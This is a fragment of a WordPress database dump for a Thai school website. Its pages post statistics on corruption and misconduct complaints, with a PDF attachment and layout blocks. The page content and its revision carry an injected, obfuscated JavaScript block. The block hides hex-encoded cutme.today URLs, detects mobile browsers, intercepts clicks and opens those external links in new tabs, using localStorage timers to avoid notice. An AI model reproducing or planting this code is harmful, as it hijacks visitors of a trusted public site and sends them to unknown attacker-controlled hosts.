_0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%87%e0%b8%aa%e0%b8%96%e0%b8%b4%e0%b8%95%e0%b8%b4%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3','','','2024-08-08 13:38:38','2024-08-08 06:38:38','',0,'http://pakhaeng.ssk.in.th/?page_id=680',0,'page','',0),
(681,1,'2024-08-08 13:36:04','2024-08-08 06:36:04','','ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%87%e0%b8%aa%e0%b8%96%e0%b8%b4%e0%b8%95%e0%b8%b4%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3','','','2024-08-08 13:36:04','2024-08-08 06:36:04','',680,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf',0,'attachment','application/pdf',0),
(682,1,'2024-08-08 13:38:37','2024-08-08 06:38:37','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":681,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ\"></object><a id=\"wp-block-file--media-41bbdffc-148d-4102-bfb9-e3cb50d67629\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-41bbdffc-148d-4102-bfb9-e3cb50d67629\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','680-revision-v1','','','2024-08-08 13:38:37','2024-08-08 06:38:37','',680,'http://pakhaeng.ssk.in.th/?p=682',0,'revision','',0),
(683,1,'2024-08-08 13:40:56','2024-08-08 06:40:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn 